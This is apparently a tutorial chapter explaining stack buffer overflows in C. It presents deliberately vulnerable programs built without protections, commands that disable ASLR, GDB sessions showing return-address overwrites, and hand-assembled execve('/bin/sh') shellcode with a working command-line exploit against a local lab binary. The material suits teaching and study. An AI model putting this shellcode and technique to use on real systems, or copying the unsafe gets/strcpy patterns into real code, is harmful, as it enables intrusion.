Dies ist eine alte Version des Dokuments!
Interacting with memory is part of every non-trivial program. In order to guarantee successful data processing, it is of utmost importance to correctly manage data buffer sizes. Writing more data than the buffer is able to contain, results in a so-called buffer overflow. The memory region following directly afterwards is overwritten in this case. This chapter tries to explain this behavior and its effect in a detailed and practical way.
Modern compilers and operating systems include protection mechanisms to avoid the effects of buffer overflows. For the sake of simplicity, these mechanisms are neglected for now and explained in later chapters. Example codes include compilation instructions in the first line to disable optimizations and protection mechanisms. All examples but the first one require that ASLR is disabled. Following command disables ASLR until it is enabled again or the machine is rebooted.
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To enable ASLR again, use the command below.
$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
As disabling ASLR and running binaries without compiler protection mechanisms imposes a security risk, it is recommended to apply this change and execute the vulnerable applications in a virtual machine or protected environment.
Keeping the theoretical concept from above in mind, a first practical example is presented next.
The code below asks the user for his name and prints whether he is an administrator or not. A user is classified as an administrator if the entered name is „admin“.
// gcc -g -O0 -m32 -std=c99 control.c #include <stdio.h> #include <string.h> #include <stdbool.h> struct User { char name[8]; bool is_admin; }; int main() { struct User user = {0}; printf("Enter user name:\n"); gets(user.name); if(strcmp(user.name, "admin") == 0) user.is_admin = true; if(user.is_admin) printf("Welcome back administrator!\n"); else printf("Meh, hello %s. I was hoping for the administrator.\n", user.name); return 0; }
Executing the code results in the output shown below.
$ ./a.out Enter user name: nufan Meh, hello nufan. I was hoping for the administrator.
Assuming basic knowledge about the C programming language, this behavior should be no surprise. While the code is short and straightforward, it still contains a significant security vulnerability. user.name
is a character array with a fixed size of 8 bytes. At the same time, the gets()
function does not limit the length of the input. Next, we intentionally exceed the available input capacity.
$ ./a.out Enter user name: 123456789 Welcome back administrator!
According to the output we are classified as an administrator although an incorrect name was entered. To retrace this behavior, we will have a look at the memory content after the initialization and after each of the above input cases. GDB is used to inspect the memory of the user
variable. Additionally, the relevant memory region is visualized to ease the understanding.
First, the state of the user
variable is inspected directly after initialization. A breakpoint is set in line 16 to stop execution and print the user
variable.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) break 16 Breakpoint 1 at 0x647: file control.c, line 16. (gdb) run Starting program: /home/memory-corruption/a.out Breakpoint 1, main () at control.c:16 16 printf("Enter user name:\n"); (gdb) p user $1 = {name = "\000\000\000\000\000\000\000", is_admin = false}
Below you can see a memory-oriented visualization of the GDB output.
Just like before, we first enter the short name „nufan“ and look at the resulting application state. To inspect the variable before exiting the application we set a breakpoint at the return
statement in line 26.
(gdb) break 26 Breakpoint 2 at 0x565556b8: file control.c, line 26. (gdb) continue Continuing. Enter user name: nufan Meh, hello nufan. I was hoping for the administrator. Breakpoint 2, main () at control.c:26 26 return 0; (gdb) p user $2 = {name = "nufan\000\000", is_admin = false}
As expected, the memory content looks reasonable. Nevertheless, we still have to look at the second - and much more interesting - case. Using „123456789“ as name exceeds the space of user.name
and results in the following state.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) break 26 Breakpoint 1 at 0x6b8: file control.c, line 26. (gdb) run Starting program: /home/memory-corruption/a.out Enter user name: 123456789 Welcome back administrator! Breakpoint 1, main () at control.c:26 26 return 0; (gdb) p user $1 = {name = "12345678", is_admin = 57}
The user.name
buffer was completely filled up. Due to the fact that even more data was entered, the '9' character (ASCII value 57) was spilled over to the consecutive variable user.is_admin
. Remember that in the C programming language every value other than 0 is considered to be true. Thus, the application classifies the user as administrator.
Simply by overflowing an input buffer the control flow of the application was redirected to a different execution branch. Although this example seems harmless as the control flow differs only by a static output, this vulnerability could equally allow an attacker to take full control over the application.
While the previous example already made use of the concept of a buffer overflow, it is rather limited as it is restricted to the use of a predefined control flow branch. With the next example we will take the exploitation one step further.
The example code copies the first command line argument to a variable located on the stack.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 function.c #include <stdio.h> #include <string.h> void admin_stuff() { printf("Welcome back administrator!\n"); } int main(int argc, char *argv[]) { char buffer[8] = {0}; if(argc != 2) { printf("A single argument is required.\n"); return 1; } printf("Copying \"%s\"\n", argv[1]); strcpy(buffer, argv[1]); return 0; }
Clearly, strcpy()
copies an input of variable size into a buffer of fixed size. Note that the code contains a function admin_stuff()
which is not part of the regular control flow. However, in contrast to the previous example, no control variable is located on the stack. This time we will not try to switch to a predefined execution branch, rather we want to call admin_stuff()
which is an existing function within the binary but outside of any control flow1). Considering the background knowledge explained in the previous chapter about program execution and function calls, we extend the view of the memory to include the information about the stack frame.
The behavior of the application under normal circumstances is observed in GDB. Checking the memory directly after the initialization of the buffer, the top of the stack looks as follows.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) set backtrace past-main (gdb) break 14 Breakpoint 1 at 0x804848d: file function.c, line 14. (gdb) break 23 Breakpoint 2 at 0x80484d2: file function.c, line 23. (gdb) run ABCD Starting program: /home/memory-corruption/a.out ABCD Breakpoint 1, main (argc=2, argv=0xffffd444) at function.c:14 14 if(argc != 2) (gdb) x/4wx $esp 0xffffd3a0: 0x00000000 0x00000000 0x00000000 0xf7e11286
We can identify 8 bytes of the buffer
variable, 4 bytes of the saved EBP
register and the 4 byte return address. Just before finishing execution, the second breakpoint stops.
(gdb) continue Continuing. Copying "ABCD" Breakpoint 2, main (argc=2, argv=0xffffd444) at function.c:23 23 return 0; (gdb) x/4wx $esp 0xffffd3a0: 0x44434241 0x00000000 0x00000000 0xf7e11286
Now the buffer is partially filled with the entered data. Observe the little-endian byte order of the values.
The goal of this exercise is to overwrite the return address 0xf7e11286
on the stack. Instead of returning to the previous function on the call stack, the control flow should be redirected to the admin_stuff()
function. With ASLR and PIE disabled, the function has a static address within the binary and at runtime. nm
is used to resolve the address of the symbol.
$ nm a.out | grep admin_stuff 08048466 T admin_stuff
This output shows that the admin_stuff()
symbol is located at address 0x08048466
in the text segment.
In order to overwrite the return address, the 8 byte buffer
and the 4 byte EBP
copy need to be overwritten first. „ABCDEFGHIJKL“ is chosen to fill up this region. The payload is terminated by the address of admin_stuff()
(0x08048466
) in little-endian format.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) break 23 Breakpoint 1 at 0x80484d2: file function.c, line 23. (gdb) run $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08") Starting program: /home/memory-corruption/a.out $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08") Copying "ABCDEFGHIJKLf[?]" Breakpoint 1, main (argc=0, argv=0xffffd434) at function.c:23 23 return 0; (gdb) x/4wx $esp 0xffffd390: 0x44434241 0x48474645 0x4c4b4a49 0x08048466 (gdb) continue Continuing. Welcome back administrator! Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? ()
Proven by the output, the admin_stuff()
function is really executed. Due to the corrupted stack layout the program crashes directly after the execution of the function with a segmentation fault. Remember that strcpy()
writes a \0
byte to finalize the destination string which was neglected in the illustrations. Of course the exploit also works outside GDB and with arbitrary fill values for the memory region before the return address.
$ ./a.out $(echo -en "000000000000\x66\x84\x04\x08") Copying "000000000000f[?]" Welcome back administrator! Segmentation fault
Although functionally identical to the previous example, the vulnerable program of this section has a larger buffer but does not contain any predefined function we want to call. Additionally, the address of the buffer is printed upon execution.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 -z execstack execve.c #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { char buffer[32] = {0}; if(argc != 2) { printf("A single argument is required.\n"); return 1; } printf("Buffer: %p\n", buffer); strcpy(buffer, argv[1]); return 0; }
The first step is to redirect execution to the buffer. This is accomplished by filling up the 32 bytes of buffer
plus the 4 bytes of the saved EBP
and overwriting the return address with the address of the buffer. We will first try this in GDB. It is important to note that addresses slightly differ when the application is executed within the debugger. Also note that command line arguments and environment variables are located on the stack and thus influence the address of the buffer
array. Execute the application with arbitrary parameters of the intended length to find out the address of the buffer. During the following example the buffer is assumed to be located at 0xffffd358
.
$ gdb -q ./a.out Reading symbols from ./a.out...done. (gdb) set disassembly-flavor intel (gdb) disassemble main Dump of assembler code for function main: 0x08048466 <+0>: push ebp [...] 0x080484d1 <+107>: ret End of assembler dump. (gdb) break *0x080484d1 Breakpoint 1 at 0x080484d1: file execve.c, line 19. (gdb) run $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff") Starting program: /home/memory-corruption/a.out $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff") Buffer: 0xffffd358 Breakpoint 1, 0x080484d1 in main (argc=0, argv=0xffffd414) at execve.c:19 20 } (gdb) ni 0xffffd358 in ?? ()
As the last line of the output indicates, the execution was successfully redirected to the buffer. However, when inspecting the instructions at this location, no meaningful code can be identified:
(gdb) x/s $eip 0xffffd358: "12345678901234567890123456789012AAAAX\323\377\377" (gdb) x/5i $eip => 0xffffd358: xor DWORD PTR [edx],esi 0xffffd35a: xor esi,DWORD PTR [esi*1+0x39383736] 0xffffd361: xor BYTE PTR [ecx],dh 0xffffd363: xor dh,BYTE PTR [ebx] 0xffffd365: xor al,0x35 (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0xffffd35a in ?? ()
The program crashes because of invalid memory accesses. Totally understandable, as we only wanted to fill up the memory and did not care about mapping its content to instructions yet. What we need at this point is executable code in compiled form. Generating this code using a high-level programming language most likely introduces unintended instructions, so we fall back to assembly. More specifically, we will use NASM to create our so-called shellcode.
Our final goal is to execute the shell /bin/sh
via the execve
system call2). Calling execve
has the following requirements when the interrupt is triggered:
EAX
contains an identifier for the system call and needs to have the value 11 (0x0b
) for execve
.EBX
points to the (\0
-terminated) name of the executable to be executed („/bin/sh“ in our case).ECX
points to argv
, this means it represents an array that contains at least a pointer to the executable name (as referenced by EBX
) and is terminated with a NULL
-pointer.EDX
points to envp
. As we do not need environment variables for the execution, we can simply set it to NULL
.
First we need to correct the stack pointer. When returning from the main
function, the stack frame is destroyed by increasing ESP
. Our buffer is still there, but ESP
was moved to a higher memory address. As we want to push some values, we need to make sure ESP
points to a memory address lower than our buffer and we do not overwrite our own code. Subtracting 0x30
(48) is a good guess as we want to skip the return address (4 bytes), the saved EBP
(4 bytes), buffer
(32 bytes) and possibly some stack-alignment padding introduced by the compiler.
sub esp,0x30
Next, we need the \0
-terminated string „/bin/sh“ on the stack. As the stack grows from bottom (high memory addresses) to top (low memory addresses), we need to push the string in reverse. Thus we start with the termination character \0
. Keep in mind that we are using strcpy()
to copy the data. It has the property to stop copying at a \0
character in the source string, so we are not allowed to have any 0 values in the compiled code. Luckily, there are several ways to calculate 0 without explicitly mentioning it. One common way is to xor a value with itself, which always results in 0 regardless of the used value.
xor eax,eax
We do not have to care about the size of this termination value, so we push the 4 byte register to the stack:
push eax
The remaining string is 7 characters long. To push it as 2 words of 4 byte each, we need to add a fill character. „//bin/sh“ is an equivalent but 8 character alternative to „/bin/sh“.
push 0x68732f6e ; hs/n push 0x69622f2f ; ib//
Now that the string is set up correctly, the registers need to be filled accordingly. EBX
needs to point to the name of the binary to execute. „//bin/sh“ was pushed to the stack with the previous commands. Hence, ESP
is a pointer to this string and can be copied to EBX
.
mov ebx,esp
Successful execution requires argv
to be set correctly. This convention is also visible in C programs: argv
is an array of pointers to strings (char *argv[]
) and terminated by a NULL
value. argv[0]
contains the executable name.
push eax ; argv[1] = NULL push ebx ; argv[0] = "//bin/sh"
ECX
needs the point to this array of pointers.
mov ecx,esp
Because no environment variables are needed, envp
, which is passed via EDX
, is set to NULL
.
mov edx,eax
Lastly, the system call number is set to 11 (0x0b) and the interrupt triggered.
mov al,0xb int 0x80
We are done! Here is the full code:
; nasm -f elf32 execve.s sub esp,0x30 xor eax,eax push eax push 0x68732f6e push 0x69622f2f mov ebx,esp push eax push ebx mov ecx,esp mov edx,eax mov al,0xb int 0x80
After translation with the nasm
assembler, objdump
is used to extract the executable code from the compiled object file.
$ objdump -d -M intel-mnemonic execve.o execve.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 83 ec 30 sub esp,0x30 3: 31 c0 xor eax,eax 5: 50 push eax 6: 68 6e 2f 73 68 push 0x68732f6e b: 68 2f 2f 62 69 push 0x69622f2f 10: 89 e3 mov ebx,esp 12: 50 push eax 13: 53 push ebx 14: 89 e1 mov ecx,esp 16: 89 c2 mov edx,eax 18: b0 0b mov al,0xb 1a: cd 80 int 0x80
A little bash magic helps to extract the opcodes and bring them into a usable form.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -En \\x$i; done \x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
Count the number of bytes used for the payload to calculate the required padding.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -en \\x$i; done | wc -c 28
To fill up 36 bytes (32 byte buffer + 4 byte EBP
) a padding of 8 bytes is required. „12345678“ was chosen in this case.
Feeding this exploit into the application executes a shell.
$ ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff") Buffer: 0xffffd3b8 $
The overall memory state correlated with the assembly code is shown in the visualization below.
Finally we managed to execute arbitrary code by exploiting a buffer overflow vulnerability!
← Back to program execution details | Overview | Continue with NOP selds → |